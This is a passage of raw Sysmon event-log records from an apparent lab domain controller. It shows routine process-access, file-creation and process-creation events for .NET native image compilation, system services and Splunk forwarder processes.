10341000x80000000000000006351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:12.540{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4584-6000-4502-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:12.525{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4584-6000-4502-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:12.525{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4584-6000-4502-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:12.322{08A6967A-4580-6000-4402-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1330-0\System.Activities.dll2021-01-14 13:22:12.322 10341000x80000000000000006361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:14.728{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4586-6000-4802-000000009A01}5028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:14.713{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4586-6000-4802-000000009A01}5028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:14.713{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4586-6000-4802-000000009A01}5028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:14.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4586-6000-4702-000000009A01}4208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:14.353{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4586-6000-4702-000000009A01}4208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:14.353{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4586-6000-4702-000000009A01}4208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:14.244{08A6967A-4584-6000-4602-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1378-0\System.Activities.Core.Presentation.dll2021-01-14 13:22:14.244 10341000x80000000000000006394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4587-6000-4C02-000000009A01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4587-6000-4C02-000000009A01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4587-6000-4C02-000000009A01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.869{08A6967A-4587-6000-4C02-000000009A01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4587-6000-4B02-000000009A01}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.775{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4587-6000-4B02-000000009A01}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:15.775{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4587-6000-4B02-000000009A01}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 